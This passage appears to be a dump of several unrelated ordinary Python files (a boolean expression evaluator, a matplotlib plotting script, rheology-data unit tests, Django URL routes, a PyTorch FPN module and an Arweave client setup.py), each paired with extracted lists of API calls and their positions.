'pmg.models.CommitteeQuestion.query.get', 'CommitteeQuestion.query.get', (['created_question_id'], {}), '(created_question_id)\n', (4452, 4473), False, 'from pmg.models import db, Committee, CommitteeQuestion\n'), ((7048, 7075), 'urllib.parse.urlparse', 'urlparse', (['response.location'], {}), '(response.location)\n', (7056, 7075), False, 'from urllib.parse import urlparse, parse_qs\n'), ((7101, 7129), 'urllib.parse.parse_qs', 'parse_qs', (['response_url.query'], {}), '(response_url.query)\n', (7109, 7129), False, 'from urllib.parse import urlparse, parse_qs\n'), ((7592, 7640), 'pmg.models.CommitteeQuestion.query.get', 'CommitteeQuestion.query.get', (['created_question_id'], {}), '(created_question_id)\n', (7619, 7640), False, 'from pmg.models import db, Committee, CommitteeQuestion\n'), ((8383, 8408), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (8398, 8408), False, 'import os\n'), ((8424, 8461), 'os.path.join', 'os.path.join', (['dir_name', 'relative_path'], {}), '(dir_name, relative_path)\n', (8436, 8461), False, 'import os\n')] |
from syloga.core.map_expression_args import map_expression_args
from syloga.utils.identity import identity
from syloga.ast.BooleanNot import BooleanNot
from syloga.ast.BooleanValue import BooleanValue
from syloga.ast.BooleanOr import BooleanOr
from syloga.ast.BooleanAnd import BooleanAnd
from syloga.ast.BooleanNand import BooleanNand
from syloga.ast.BooleanNor import BooleanNor
from syloga.ast.BooleanXor import BooleanXor
from syloga.ast.BreakOut import BreakOut
# from syloga.core.assert_equality_by_table import assert_equality_by_table
def evaluate_expr(expression):
recurse = evaluate_expr
# result = assert_equality_by_table
result = identity
#arg_is_value = lambda arg: isinstance(arg, (BooleanValue, bool))
arg_is_value = lambda arg: type(arg) in [BooleanValue, bool]
def arg_is_value(arg):
is_value = type(arg) in [BooleanValue, bool]
#print("is arg a value? " + str(type(arg)) + " " + str(arg))
#print("is_value", is_value)
return is_value
args_are_values = lambda args: all(map(arg_is_value, args))
get_value = lambda arg: arg if type(arg) == bool else arg.value
is_true = lambda val: val == True
is_false = lambda val: val == False
#print("looking at " + str(type(expression)))
if type(expression) == BooleanNot:
assert(len(expression.args) == 1)
arg = recurse(expression.args[0]);
if arg_is_value(arg):
return result(BooleanValue(not get_value(arg)))
else:
return result(BooleanNot(arg))
elif type(expression) == BooleanOr:
args = list(map(recurse, expression.args))
arg_values = [get_value(arg) for arg in args if arg_is_value(arg)]
args_wo_neutral = list(filter(lambda x: not(arg_is_value(x) and is_false(get_value(x))),args))
if args_are_values(args):
return result(BooleanValue(any(arg_values)))
elif any(map(is_true,arg_values)):
return result(BooleanValue(True))
elif len(args) == 1:
return result(recurse(args[0]))
elif len(args_wo_neutral) < len(args):
return result(recurse(BooleanOr(*args_wo_neutral)))
else:
return result(BooleanOr(*args))
elif type(expression) == BooleanAnd:
args = list(map(recurse, expression.args))
#print(expression.args)
#print(args)
#negated_atom_values = [not get_value(arg) for arg in args if arg_is_value(arg)]
arg_values = [get_value(arg) for arg in args if arg_is_value(arg)]
args_wo_neutral = list(filter(lambda x: not(arg_is_value(x) and is_true(get_value(x))),args))
#print(arg_values)
if args_are_values(args):
return result(BooleanValue(all(map(is_true,arg_values))))
elif any(map(is_false,arg_values)):
return result(BooleanValue(False))
elif len(args) == 1:
return result(recurse(args[0]))
elif len(args_wo_neutral) < len(args):
return result(recurse(BooleanAnd(*args_wo_neutral)))
else:
return result(BooleanAnd(*args))
elif type(expression) == BooleanNand:
return result(recurse(BooleanNot(BooleanAnd(*expression.args))))
elif type(expression) == BooleanNor:
return result(recurse(BooleanNot(BooleanOr(*expression.args))))
elif type(expression) == BooleanXor:
args = list(map(recurse, expression.args))
arg_values = [get_value(arg) for arg in args if arg_is_value(arg)]
non_value_args = [arg for arg in args if not arg_is_value(arg)]
if len(args) == 0:
raise ValueError("args are missing")
elif len(args) == 1:
return result(args[0])
elif len(arg_values) == 0:
return result(BooleanXor(*non_value_args))
elif len(arg_values) == 1:
if is_true(arg_values[0]):
return result(BooleanXor(arg_values[0], *non_value_args))
else:
return result(recurse(BooleanXor(*non_value_args)))
elif len(arg_values) > 1:
evaluated = is_true(arg_values[0])
for a in arg_values[1:]:
evaluated ^= is_true(a)
evaluated = bool(evaluated)
return result(recurse(BooleanXor(evaluated, *non_value_args)))
elif type(expression) == BreakOut:
expr = recurse(expression.expr)
if arg_is_value(expr):
return result(BooleanValue(expr))
else:
return result(BreakOut(expr))
else:
return result(map_expression_args(recurse, expression, recurse_collection=True))
| [
"syloga.ast.BooleanNot.BooleanNot",
"syloga.ast.BooleanXor.BooleanXor",
"syloga.ast.BooleanOr.BooleanOr",
"syloga.ast.BooleanAnd.BooleanAnd",
"syloga.core.map_expression_args.map_expression_args",
"syloga.ast.BooleanValue.BooleanValue",
"syloga.ast.BreakOut.BreakOut"
]
| [((1555, 1570), 'syloga.ast.BooleanNot.BooleanNot', 'BooleanNot', (['arg'], {}), '(arg)\n', (1565, 1570), False, 'from syloga.ast.BooleanNot import BooleanNot\n'), ((2036, 2054), 'syloga.ast.BooleanValue.BooleanValue', 'BooleanValue', (['(True)'], {}), '(True)\n', (2048, 2054), False, 'from syloga.ast.BooleanValue import BooleanValue\n'), ((2960, 2979), 'syloga.ast.BooleanValue.BooleanValue', 'BooleanValue', (['(False)'], {}), '(False)\n', (2972, 2979), False, 'from syloga.ast.BooleanValue import BooleanValue\n'), ((2307, 2323), 'syloga.ast.BooleanOr.BooleanOr', 'BooleanOr', (['*args'], {}), '(*args)\n', (2316, 2323), False, 'from syloga.ast.BooleanOr import BooleanOr\n'), ((3332, 3360), 'syloga.ast.BooleanAnd.BooleanAnd', 'BooleanAnd', (['*expression.args'], {}), '(*expression.args)\n', (3342, 3360), False, 'from syloga.ast.BooleanAnd import BooleanAnd\n'), ((2228, 2255), 'syloga.ast.BooleanOr.BooleanOr', 'BooleanOr', (['*args_wo_neutral'], {}), '(*args_wo_neutral)\n', (2237, 2255), False, 'from syloga.ast.BooleanOr import BooleanOr\n'), ((3225, 3242), 'syloga.ast.BooleanAnd.BooleanAnd', 'BooleanAnd', (['*args'], {}), '(*args)\n', (3235, 3242), False, 'from syloga.ast.BooleanAnd import BooleanAnd\n'), ((3451, 3478), 'syloga.ast.BooleanOr.BooleanOr', 'BooleanOr', (['*expression.args'], {}), '(*expression.args)\n', (3460, 3478), False, 'from syloga.ast.BooleanOr import BooleanOr\n'), ((4798, 4863), 'syloga.core.map_expression_args.map_expression_args', 'map_expression_args', (['recurse', 'expression'], {'recurse_collection': '(True)'}), '(recurse, expression, recurse_collection=True)\n', (4817, 4863), False, 'from syloga.core.map_expression_args import map_expression_args\n'), ((3153, 3181), 'syloga.ast.BooleanAnd.BooleanAnd', 'BooleanAnd', (['*args_wo_neutral'], {}), '(*args_wo_neutral)\n', (3163, 3181), False, 'from syloga.ast.BooleanAnd import BooleanAnd\n'), ((4684, 4702), 'syloga.ast.BooleanValue.BooleanValue', 'BooleanValue', (['expr'], {}), '(expr)\n', (4696, 4702), False, 'from syloga.ast.BooleanValue import BooleanValue\n'), ((4744, 4758), 'syloga.ast.BreakOut.BreakOut', 'BreakOut', (['expr'], {}), '(expr)\n', (4752, 4758), False, 'from syloga.ast.BreakOut import BreakOut\n'), ((3967, 3994), 'syloga.ast.BooleanXor.BooleanXor', 'BooleanXor', (['*non_value_args'], {}), '(*non_value_args)\n', (3977, 3994), False, 'from syloga.ast.BooleanXor import BooleanXor\n'), ((4109, 4151), 'syloga.ast.BooleanXor.BooleanXor', 'BooleanXor', (['arg_values[0]', '*non_value_args'], {}), '(arg_values[0], *non_value_args)\n', (4119, 4151), False, 'from syloga.ast.BooleanXor import BooleanXor\n'), ((4209, 4236), 'syloga.ast.BooleanXor.BooleanXor', 'BooleanXor', (['*non_value_args'], {}), '(*non_value_args)\n', (4219, 4236), False, 'from syloga.ast.BooleanXor import BooleanXor\n'), ((4497, 4535), 'syloga.ast.BooleanXor.BooleanXor', 'BooleanXor', (['evaluated', '*non_value_args'], {}), '(evaluated, *non_value_args)\n', (4507, 4535), False, 'from syloga.ast.BooleanXor import BooleanXor\n')] |
from parameters import *
from library_time import *
from paths import *
import numpy as np
import pylab as plt
import matplotlib.pyplot as mplt
mplt.rc('text', usetex=True)
mplt.rcParams.update({'font.size': 16})
import logging, getopt, sys
import time
import os
##########################################################################################
# C O N F I G U R A T I O N
##########################################################################################
# activate ylim for w
var1 = w1
var3 = w3
var5 = w5
var10 = w10
var25 = w25
mode = "w" # u or w
##########################################################################################
# M A I N
##########################################################################################
if __name__ == "__main__":
if not os.path.exists('plots'):
os.makedirs('plots')
print('Created folder plots!')
if not os.path.exists('plots/integral'):
os.makedirs('plots/integral')
print('Created folder plots/integral!')
t = np.linspace(tmin, tmax, Nt)
r = np.linspace(0,R,Nr)
Ivar1 = np.zeros(Nt)
Ivar3 = np.zeros(Nt)
Ivar5 = np.zeros(Nt)
Ivar10 = np.zeros(Nt)
Ivar25 = np.zeros(Nt)
for i in range(Nt):
# /1000000 because of units
Ivar1[i] = integrate(var1, i,r, Nt)/1000000
Ivar3[i] = integrate(var3, i,r, Nt)/1000000
Ivar5[i] = integrate(var5, i,r, Nt)/1000000
Ivar10[i] = integrate(var10, i,r, Nt)/1000000
Ivar25[i] = integrate(var25, i,r, Nt)/1000000
mplt.plot(t, Ivar1, label=r'$\alpha = 1$')
mplt.plot(t, Ivar3, label=r'$\alpha = 3$')
mplt.plot(t, Ivar5, label=r'$\alpha = 5$')
mplt.plot(t, Ivar10, label=r'$\alpha = 10$')
mplt.plot(t, Ivar25, label=r'$\alpha = 25$')
mplt.xlim(tmin, tmax)
mplt.yscale('log')
mplt.xlabel(r'$t\quad [h]$')
mplt.ylabel(r'$\bar{'+mode+'}\quad [\mu mol]$')
##########################################################################################
# lim for w, because some values dont make sense
mplt.ylim(1e-11, 3e2)
# lim for w, because some values dont make sense
##########################################################################################
mplt.legend(loc=1, bbox_to_anchor=(1, 0.9))
mplt.tight_layout()
mplt.savefig('plots/integral/int'+mode+'.pdf', format='pdf')
mplt.show() | [
"os.path.exists",
"matplotlib.pyplot.savefig",
"os.makedirs",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.legend",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.plot",
"matplotlib.pyplot.rcParams.update",
"numpy.linspace",
"numpy.zeros",
"matplotlib.pyplot.tight_layout",
"matplotlib.pyplot.ylim",
"matplotlib.pyplot.xlim",
"matplotlib.pyplot.yscale",
"matplotlib.pyplot.rc",
"matplotlib.pyplot.show"
]
| [((145, 173), 'matplotlib.pyplot.rc', 'mplt.rc', (['"""text"""'], {'usetex': '(True)'}), "('text', usetex=True)\n", (152, 173), True, 'import matplotlib.pyplot as mplt\n'), ((174, 213), 'matplotlib.pyplot.rcParams.update', 'mplt.rcParams.update', (["{'font.size': 16}"], {}), "({'font.size': 16})\n", (194, 213), True, 'import matplotlib.pyplot as mplt\n'), ((1057, 1084), 'numpy.linspace', 'np.linspace', (['tmin', 'tmax', 'Nt'], {}), '(tmin, tmax, Nt)\n', (1068, 1084), True, 'import numpy as np\n'), ((1093, 1114), 'numpy.linspace', 'np.linspace', (['(0)', 'R', 'Nr'], {}), '(0, R, Nr)\n', (1104, 1114), True, 'import numpy as np\n'), ((1131, 1143), 'numpy.zeros', 'np.zeros', (['Nt'], {}), '(Nt)\n', (1139, 1143), True, 'import numpy as np\n'), ((1157, 1169), 'numpy.zeros', 'np.zeros', (['Nt'], {}), '(Nt)\n', (1165, 1169), True, 'import numpy as np\n'), ((1183, 1195), 'numpy.zeros', 'np.zeros', (['Nt'], {}), '(Nt)\n', (1191, 1195), True, 'import numpy as np\n'), ((1209, 1221), 'numpy.zeros', 'np.zeros', (['Nt'], {}), '(Nt)\n', (1217, 1221), True, 'import numpy as np\n'), ((1235, 1247), 'numpy.zeros', 'np.zeros', (['Nt'], {}), '(Nt)\n', (1243, 1247), True, 'import numpy as np\n'), ((1585, 1627), 'matplotlib.pyplot.plot', 'mplt.plot', (['t', 'Ivar1'], {'label': '"""$\\\\alpha = 1$"""'}), "(t, Ivar1, label='$\\\\alpha = 1$')\n", (1594, 1627), True, 'import matplotlib.pyplot as mplt\n'), ((1632, 1674), 'matplotlib.pyplot.plot', 'mplt.plot', (['t', 'Ivar3'], {'label': '"""$\\\\alpha = 3$"""'}), "(t, Ivar3, label='$\\\\alpha = 3$')\n", (1641, 1674), True, 'import matplotlib.pyplot as mplt\n'), ((1679, 1721), 'matplotlib.pyplot.plot', 'mplt.plot', (['t', 'Ivar5'], {'label': '"""$\\\\alpha = 5$"""'}), "(t, Ivar5, label='$\\\\alpha = 5$')\n", (1688, 1721), True, 'import matplotlib.pyplot as mplt\n'), ((1726, 1770), 'matplotlib.pyplot.plot', 'mplt.plot', (['t', 'Ivar10'], {'label': '"""$\\\\alpha = 10$"""'}), "(t, Ivar10, label='$\\\\alpha = 10$')\n", (1735, 1770), True, 'import matplotlib.pyplot as mplt\n'), ((1775, 1819), 'matplotlib.pyplot.plot', 'mplt.plot', (['t', 'Ivar25'], {'label': '"""$\\\\alpha = 25$"""'}), "(t, Ivar25, label='$\\\\alpha = 25$')\n", (1784, 1819), True, 'import matplotlib.pyplot as mplt\n'), ((1824, 1845), 'matplotlib.pyplot.xlim', 'mplt.xlim', (['tmin', 'tmax'], {}), '(tmin, tmax)\n', (1833, 1845), True, 'import matplotlib.pyplot as mplt\n'), ((1850, 1868), 'matplotlib.pyplot.yscale', 'mplt.yscale', (['"""log"""'], {}), "('log')\n", (1861, 1868), True, 'import matplotlib.pyplot as mplt\n'), ((1873, 1901), 'matplotlib.pyplot.xlabel', 'mplt.xlabel', (['"""$t\\\\quad [h]$"""'], {}), "('$t\\\\quad [h]$')\n", (1884, 1901), True, 'import matplotlib.pyplot as mplt\n'), ((1906, 1959), 'matplotlib.pyplot.ylabel', 'mplt.ylabel', (["('$\\\\bar{' + mode + '}\\\\quad [\\\\mu mol]$')"], {}), "('$\\\\bar{' + mode + '}\\\\quad [\\\\mu mol]$')\n", (1917, 1959), True, 'import matplotlib.pyplot as mplt\n'), ((2102, 2125), 'matplotlib.pyplot.ylim', 'mplt.ylim', (['(1e-11)', '(300.0)'], {}), '(1e-11, 300.0)\n', (2111, 2125), True, 'import matplotlib.pyplot as mplt\n'), ((2273, 2316), 'matplotlib.pyplot.legend', 'mplt.legend', ([], {'loc': '(1)', 'bbox_to_anchor': '(1, 0.9)'}), '(loc=1, bbox_to_anchor=(1, 0.9))\n', (2284, 2316), True, 'import matplotlib.pyplot as mplt\n'), ((2321, 2340), 'matplotlib.pyplot.tight_layout', 'mplt.tight_layout', ([], {}), '()\n', (2338, 2340), True, 'import matplotlib.pyplot as mplt\n'), ((2345, 2409), 'matplotlib.pyplot.savefig', 'mplt.savefig', (["('plots/integral/int' + mode + '.pdf')"], {'format': '"""pdf"""'}), "('plots/integral/int' + mode + '.pdf', format='pdf')\n", (2357, 2409), True, 'import matplotlib.pyplot as mplt\n'), ((2410, 2421), 'matplotlib.pyplot.show', 'mplt.show', ([], {}), '()\n', (2419, 2421), True, 'import matplotlib.pyplot as mplt\n'), ((820, 843), 'os.path.exists', 'os.path.exists', (['"""plots"""'], {}), "('plots')\n", (834, 843), False, 'import os\n'), ((853, 873), 'os.makedirs', 'os.makedirs', (['"""plots"""'], {}), "('plots')\n", (864, 873), False, 'import os\n'), ((924, 956), 'os.path.exists', 'os.path.exists', (['"""plots/integral"""'], {}), "('plots/integral')\n", (938, 956), False, 'import os\n'), ((966, 995), 'os.makedirs', 'os.makedirs', (['"""plots/integral"""'], {}), "('plots/integral')\n", (977, 995), False, 'import os\n')] |
import sys, os
sys.path.append("C:/Users/Delgado/Documents/Research/rheology-data-toolkit/rheodata/extractors")
import h5py
import pandas as pd
from antonpaar import AntonPaarExtractor as APE
from ARES_G2 import ARES_G2Extractor
# %%
sys.path.append("C:/Users/Delgado/Documents/Research/rheology-data-toolkit/rheodata")
from data_converter import rheo_data_transformer
import unittest
extractor = APE()
#converter = data_converter()
class TestAntonPaar(unittest.TestCase):
def setUp(self):
self.multi_file_test = "C:/Users/Delgado/Documents/Research/rheology-data-toolkit/tests/test_data/Anton_Paar/excel_test_data/two_tests_Steady State Viscosity Curve-LO50C_excel.xlsx"
self.modified_dict, self.raw_data_dict, self.cols, self.units = extractor.import_rheo_data(self.multi_file_test)
# Inilize the class to convert
self.converter = rheo_data_transformer(self.modified_dict, self.raw_data_dict, self.cols, self.units)
self.converter.load_to_hdf("test")
def test_modified_output_isdictionary(self):
self.assertIsInstance(self.modified_dict, dict)
def test_modified_output_dictionary_contains_pandas(self):
""" Test if the output is a dictonary of pandas dataframes'"""
for value in self.modified_dict.values():
self.assertIsInstance(value, pd.DataFrame)
def test_raw_output_isdictionary(self):
self.assertIsInstance(self.raw_data_dict, dict)
def test_raw_output_dictionary_contains_pandas(self):
""" Test if the output is a dictonary of pandas dataframes'"""
for value in self.raw_data_dict.values():
self.assertIsInstance(value, pd.DataFrame)
def test_project_name_added_raw_data(self):
""" Test if the output is a dictonary of pandas dataframes'"""
for df in self.raw_data_dict.values():
self.assertEqual(df.iloc[0,0], "Project:")
def test_hdf5_created(self):
name, ext = os.path.splitext("test.hdf5")
self.assertEqual(ext, ".hdf5")
def test_project_subfolders_added(self):
f = h5py.File('test.hdf5', "r")
project_keys = list(f['Project'].keys())
f.close()
self.assertListEqual(project_keys, ['Steady State Viscosity Curve-75C','Steady State Viscosity Curve-LO80C', ])
def test_analyze_cols(self):
temp_df = extractor.make_analyze_dataframes(self.multi_file_test)
for test_key in temp_df.keys():
test_cols = list(temp_df[test_key].columns)
parsed_cols = list(self.cols[test_key])
self.assertListEqual(test_cols, parsed_cols)
# TODO Write test for saving a file
if __name__ == '__main__':
unittest.main()
| [
"antonpaar.AntonPaarExtractor",
"os.path.splitext",
"h5py.File",
"data_converter.rheo_data_transformer",
"unittest.main",
"sys.path.append"
]
| [((15, 121), 'sys.path.append', 'sys.path.append', (['"""C:/Users/Delgado/Documents/Research/rheology-data-toolkit/rheodata/extractors"""'], {}), "(\n 'C:/Users/Delgado/Documents/Research/rheology-data-toolkit/rheodata/extractors'\n )\n", (30, 121), False, 'import sys, os\n'), ((236, 326), 'sys.path.append', 'sys.path.append', (['"""C:/Users/Delgado/Documents/Research/rheology-data-toolkit/rheodata"""'], {}), "(\n 'C:/Users/Delgado/Documents/Research/rheology-data-toolkit/rheodata')\n", (251, 326), False, 'import sys, os\n'), ((401, 406), 'antonpaar.AntonPaarExtractor', 'APE', ([], {}), '()\n', (404, 406), True, 'from antonpaar import AntonPaarExtractor as APE\n'), ((2711, 2726), 'unittest.main', 'unittest.main', ([], {}), '()\n', (2724, 2726), False, 'import unittest\n'), ((877, 965), 'data_converter.rheo_data_transformer', 'rheo_data_transformer', (['self.modified_dict', 'self.raw_data_dict', 'self.cols', 'self.units'], {}), '(self.modified_dict, self.raw_data_dict, self.cols,\n self.units)\n', (898, 965), False, 'from data_converter import rheo_data_transformer\n'), ((1969, 1998), 'os.path.splitext', 'os.path.splitext', (['"""test.hdf5"""'], {}), "('test.hdf5')\n", (1985, 1998), False, 'import sys, os\n'), ((2100, 2127), 'h5py.File', 'h5py.File', (['"""test.hdf5"""', '"""r"""'], {}), "('test.hdf5', 'r')\n", (2109, 2127), False, 'import h5py\n')] |
from django.conf.urls.defaults import url, include, patterns
from corehq.apps.appstore.dispatcher import AppstoreDispatcher
store_urls = patterns('corehq.apps.appstore.views',
url(r'^$', 'appstore_default', name="appstore_interfaces_default"),
AppstoreDispatcher.url_pattern(),
)
urlpatterns = patterns('corehq.apps.appstore.views',
url(r'^$', 'appstore', name='appstore'),
url(r'^api/', 'appstore_api', name='appstore_api'),
url(r'^store/', include(store_urls)),
url(r'^(?P<domain>[\w\.-]+)/info/$', 'project_info', name='project_info'),
url(r'^deployments/$', 'deployments', name='deployments'),
url(r'^deployments/api/$', 'deployments_api', name='deployments_api'),
url(r'^deployments/(?P<domain>[\w\.-]+)/info/$', 'deployment_info', name='deployment_info'),
url(r'^(?P<domain>[\w\.-]+)/approve/$', 'approve_app', name='approve_appstore_app'),
url(r'^(?P<domain>[\w\.-]+)/copy/$', 'copy_snapshot', name='domain_copy_snapshot'),
url(r'^(?P<domain>[\w\.-]+)/importapp/$', 'import_app', name='import_app_from_snapshot'),
url(r'^(?P<domain>[\w\.-]+)/image/$', 'project_image', name='appstore_project_image'),
url(r'^(?P<domain>[\w\.-]+)/multimedia/$', 'media_files', name='media_files'),
)
| [
"django.conf.urls.defaults.include",
"django.conf.urls.defaults.url",
"corehq.apps.appstore.dispatcher.AppstoreDispatcher.url_pattern"
]
| [((181, 246), 'django.conf.urls.defaults.url', 'url', (['"""^$"""', '"""appstore_default"""'], {'name': '"""appstore_interfaces_default"""'}), "('^$', 'appstore_default', name='appstore_interfaces_default')\n", (184, 246), False, 'from django.conf.urls.defaults import url, include, patterns\n'), ((253, 285), 'corehq.apps.appstore.dispatcher.AppstoreDispatcher.url_pattern', 'AppstoreDispatcher.url_pattern', ([], {}), '()\n', (283, 285), False, 'from corehq.apps.appstore.dispatcher import AppstoreDispatcher\n'), ((347, 385), 'django.conf.urls.defaults.url', 'url', (['"""^$"""', '"""appstore"""'], {'name': '"""appstore"""'}), "('^$', 'appstore', name='appstore')\n", (350, 385), False, 'from django.conf.urls.defaults import url, include, patterns\n'), ((392, 441), 'django.conf.urls.defaults.url', 'url', (['"""^api/"""', '"""appstore_api"""'], {'name': '"""appstore_api"""'}), "('^api/', 'appstore_api', name='appstore_api')\n", (395, 441), False, 'from django.conf.urls.defaults import url, include, patterns\n'), ((491, 565), 'django.conf.urls.defaults.url', 'url', (['"""^(?P<domain>[\\\\w\\\\.-]+)/info/$"""', '"""project_info"""'], {'name': '"""project_info"""'}), "('^(?P<domain>[\\\\w\\\\.-]+)/info/$', 'project_info', name='project_info')\n", (494, 565), False, 'from django.conf.urls.defaults import url, include, patterns\n'), ((571, 627), 'django.conf.urls.defaults.url', 'url', (['"""^deployments/$"""', '"""deployments"""'], {'name': '"""deployments"""'}), "('^deployments/$', 'deployments', name='deployments')\n", (574, 627), False, 'from django.conf.urls.defaults import url, include, patterns\n'), ((634, 702), 'django.conf.urls.defaults.url', 'url', (['"""^deployments/api/$"""', '"""deployments_api"""'], {'name': '"""deployments_api"""'}), "('^deployments/api/$', 'deployments_api', name='deployments_api')\n", (637, 702), False, 'from django.conf.urls.defaults import url, include, patterns\n'), ((709, 806), 'django.conf.urls.defaults.url', 'url', (['"""^deployments/(?P<domain>[\\\\w\\\\.-]+)/info/$"""', '"""deployment_info"""'], {'name': '"""deployment_info"""'}), "('^deployments/(?P<domain>[\\\\w\\\\.-]+)/info/$', 'deployment_info', name=\n 'deployment_info')\n", (712, 806), False, 'from django.conf.urls.defaults import url, include, patterns\n'), ((807, 896), 'django.conf.urls.defaults.url', 'url', (['"""^(?P<domain>[\\\\w\\\\.-]+)/approve/$"""', '"""approve_app"""'], {'name': '"""approve_appstore_app"""'}), "('^(?P<domain>[\\\\w\\\\.-]+)/approve/$', 'approve_app', name=\n 'approve_appstore_app')\n", (810, 896), False, 'from django.conf.urls.defaults import url, include, patterns\n'), ((896, 984), 'django.conf.urls.defaults.url', 'url', (['"""^(?P<domain>[\\\\w\\\\.-]+)/copy/$"""', '"""copy_snapshot"""'], {'name': '"""domain_copy_snapshot"""'}), "('^(?P<domain>[\\\\w\\\\.-]+)/copy/$', 'copy_snapshot', name=\n 'domain_copy_snapshot')\n", (899, 984), False, 'from django.conf.urls.defaults import url, include, patterns\n'), ((984, 1078), 'django.conf.urls.defaults.url', 'url', (['"""^(?P<domain>[\\\\w\\\\.-]+)/importapp/$"""', '"""import_app"""'], {'name': '"""import_app_from_snapshot"""'}), "('^(?P<domain>[\\\\w\\\\.-]+)/importapp/$', 'import_app', name=\n 'import_app_from_snapshot')\n", (987, 1078), False, 'from django.conf.urls.defaults import url, include, patterns\n'), ((1078, 1169), 'django.conf.urls.defaults.url', 'url', (['"""^(?P<domain>[\\\\w\\\\.-]+)/image/$"""', '"""project_image"""'], {'name': '"""appstore_project_image"""'}), "('^(?P<domain>[\\\\w\\\\.-]+)/image/$', 'project_image', name=\n 'appstore_project_image')\n", (1081, 1169), False, 'from django.conf.urls.defaults import url, include, patterns\n'), ((1169, 1247), 'django.conf.urls.defaults.url', 'url', (['"""^(?P<domain>[\\\\w\\\\.-]+)/multimedia/$"""', '"""media_files"""'], {'name': '"""media_files"""'}), "('^(?P<domain>[\\\\w\\\\.-]+)/multimedia/$', 'media_files', name='media_files')\n", (1172, 1247), False, 'from django.conf.urls.defaults import url, include, patterns\n'), ((464, 483), 'django.conf.urls.defaults.include', 'include', (['store_urls'], {}), '(store_urls)\n', (471, 483), False, 'from django.conf.urls.defaults import url, include, patterns\n')] |
from __future__ import absolute_import
import torch
from torch.nn import functional
class FPN(torch.nn.Module):
def __init__(self, out_channels):
super(FPN, self).__init__()
self.out_channels = out_channels
self.P5 = torch.nn.MaxPool2d(kernel_size=1, stride=2, padding=0)
self.P4_conv1 = torch.nn.Conv2d(512, self.out_channels, kernel_size=1, stride=1, padding=0)
self.P4_conv2 = torch.nn.Conv2d(self.out_channels, self.out_channels, 3, 1, 1)
self.P3_conv1 = torch.nn.Conv2d(512, self.out_channels, kernel_size=1, stride=1, padding=0)
self.P3_conv2 = torch.nn.Conv2d(self.out_channels, self.out_channels, 3, 1, 1)
self.P2_conv1 = torch.nn.Conv2d(256, self.out_channels, kernel_size=1, stride=1, padding=0)
self.P2_conv2 = torch.nn.Conv2d(self.out_channels, self.out_channels, 3, 1, 1)
normal_init(self.P4_conv1, 0, 0.01)
normal_init(self.P4_conv2, 0, 0.01)
normal_init(self.P3_conv1, 0, 0.01)
normal_init(self.P3_conv2, 0, 0.01)
normal_init(self.P2_conv1, 0, 0.01)
normal_init(self.P2_conv2, 0, 0.01)
def forward(self, C2, C3, C4):
p4_out = self.P4_conv1(C4)
p5_out = self.P5(p4_out)
p3_out = self._upsample_add(p4_out, self.P3_conv1(C3))
p2_out = self._upsample_add(p3_out, self.P2_conv1(C2))
p4_out = self.P4_conv2(p4_out)
p3_out = self.P3_conv2(p3_out)
p2_out = self.P2_conv2(p2_out)
return p2_out, p3_out, p4_out, p5_out
def _upsample_add(self, x, y):
'''Upsample and add two feature maps.
Args:
x: (Variable) top feature map to be upsampled.
y: (Variable) lateral feature map.
Returns:
(Variable) added feature map.
Note in PyTorch, when input size is odd, the upsampled feature map
with `F.upsample(..., scale_factor=2, mode='nearest')`
maybe not equal to the lateral feature map size.
e.g.
original input size: [N,_,15,15] ->
conv2d feature map size: [N,_,8,8] ->
upsampled feature map size: [N,_,16,16]
So we choose bilinear upsample which supports arbitrary output sizes.
'''
_,_,H,W = y.size()
return functional.interpolate(x, size=(H,W), mode='bilinear') + y
def normal_init(m, mean, stddev, truncated=False):
"""
weight initalizer: truncated normal and random normal.
"""
# x is a parameter
if truncated:
m.weight.data.normal_().fmod_(2).mul_(stddev).add_(mean) # not a perfect approximation
else:
m.weight.data.normal_(mean, stddev)
m.bias.data.zero_() | [
"torch.nn.MaxPool2d",
"torch.nn.functional.interpolate",
"torch.nn.Conv2d"
]
| [((247, 301), 'torch.nn.MaxPool2d', 'torch.nn.MaxPool2d', ([], {'kernel_size': '(1)', 'stride': '(2)', 'padding': '(0)'}), '(kernel_size=1, stride=2, padding=0)\n', (265, 301), False, 'import torch\n'), ((327, 402), 'torch.nn.Conv2d', 'torch.nn.Conv2d', (['(512)', 'self.out_channels'], {'kernel_size': '(1)', 'stride': '(1)', 'padding': '(0)'}), '(512, self.out_channels, kernel_size=1, stride=1, padding=0)\n', (342, 402), False, 'import torch\n'), ((427, 489), 'torch.nn.Conv2d', 'torch.nn.Conv2d', (['self.out_channels', 'self.out_channels', '(3)', '(1)', '(1)'], {}), '(self.out_channels, self.out_channels, 3, 1, 1)\n', (442, 489), False, 'import torch\n'), ((515, 590), 'torch.nn.Conv2d', 'torch.nn.Conv2d', (['(512)', 'self.out_channels'], {'kernel_size': '(1)', 'stride': '(1)', 'padding': '(0)'}), '(512, self.out_channels, kernel_size=1, stride=1, padding=0)\n', (530, 590), False, 'import torch\n'), ((615, 677), 'torch.nn.Conv2d', 'torch.nn.Conv2d', (['self.out_channels', 'self.out_channels', '(3)', '(1)', '(1)'], {}), '(self.out_channels, self.out_channels, 3, 1, 1)\n', (630, 677), False, 'import torch\n'), ((703, 778), 'torch.nn.Conv2d', 'torch.nn.Conv2d', (['(256)', 'self.out_channels'], {'kernel_size': '(1)', 'stride': '(1)', 'padding': '(0)'}), '(256, self.out_channels, kernel_size=1, stride=1, padding=0)\n', (718, 778), False, 'import torch\n'), ((803, 865), 'torch.nn.Conv2d', 'torch.nn.Conv2d', (['self.out_channels', 'self.out_channels', '(3)', '(1)', '(1)'], {}), '(self.out_channels, self.out_channels, 3, 1, 1)\n', (818, 865), False, 'import torch\n'), ((2263, 2318), 'torch.nn.functional.interpolate', 'functional.interpolate', (['x'], {'size': '(H, W)', 'mode': '"""bilinear"""'}), "(x, size=(H, W), mode='bilinear')\n", (2285, 2318), False, 'from torch.nn import functional\n')] |
from distutils.core import setup
setup(
name="arweave-python-client",
packages = ['arweave'], # this must be the same as the name above
version="1.0.15.dev0",
description="Client interface for sending transactions on the Arweave permaweb",
author="<NAME>",
author_email="<EMAIL>",
url="https://github.com/MikeHibbert/arweave-python-client",
download_url="https://github.com/MikeHibbert/arweave-python-client",
keywords=['arweave', 'crypto'],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
install_requires=[
'arrow',
'python-jose',
'pynacl',
'pycryptodome',
'cryptography',
'requests',
'psutil'
],
